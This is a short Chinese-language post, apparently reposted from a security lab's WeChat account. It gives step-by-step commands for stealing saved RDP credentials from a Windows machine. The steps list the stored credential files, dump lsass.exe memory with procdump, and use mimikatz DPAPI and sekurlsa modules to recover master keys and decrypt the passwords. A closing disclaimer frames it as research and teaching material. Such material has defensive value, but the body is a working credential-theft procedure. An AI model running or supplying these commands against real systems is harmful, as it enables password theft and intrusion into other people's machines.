RDP保存的凭据解密
前置条件:
1、用户保存了RDP凭据,注意多用户的情况。
2、能够获取到MasterKey。
解密过程:
1、查看是否存在保存的凭据
dir /a %userprofile%AppDataLocalMicrosoftCredentials*
2、Dump Lsass.exe
如:procdump64.exe -accepteula -ma lsass.exe lsass.dmp
3、获取guidMasterKey,记录guidMasterKey的值。
mimikatz.exe"privilege::debug""dpapi::cred /in:76FB6A1FE394518B517E6981FF4F0AC4"exit
4、通过guidMasterKey找到对应的GUID,记录它的MasterKey的值。
mimikatz.exe "sekurlsa::minidump lsass.dmp""sekurlsa::dpapi"exit
5、获取保存的凭据信息。
mimikatz.exe "dpapi::cred /in:凭据文件名/masterkey:MasterKey的值"exit
原文始发于微信公众号(YongYe 安全实验室):RDP凭据解密
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论